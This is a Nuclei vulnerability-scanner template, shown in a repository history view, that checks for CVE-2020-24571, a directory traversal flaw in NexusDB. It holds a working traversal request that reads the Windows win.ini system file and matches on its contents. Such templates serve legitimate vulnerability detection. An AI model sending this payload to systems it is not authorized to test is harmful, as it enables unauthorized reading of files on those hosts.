nuclei-templates/cves/2020/CVE-2020-24571.yaml

35 lines
868 B
YAML
Raw Normal View History

2021-02-19 00:24:22 +00:00
id: CVE-2020-24571
2021-02-19 00:24:22 +00:00
info:
name: NexusDB <4.50.23 - Local File Inclusion
2021-02-19 00:24:22 +00:00
author: pikpikcu
severity: high
description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal and local file inclusion.
reference:
- https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371
- https://nvd.nist.gov/vuln/detail/CVE-2020-24571
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-24571
cwe-id: CWE-22
tags: cve,cve2020,nexusdb,lfi
2021-02-19 00:24:22 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/../../../../../../../../windows/win.ini'
matchers-condition: and
matchers:
- type: word
words:
- "[extensions]"
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/07/13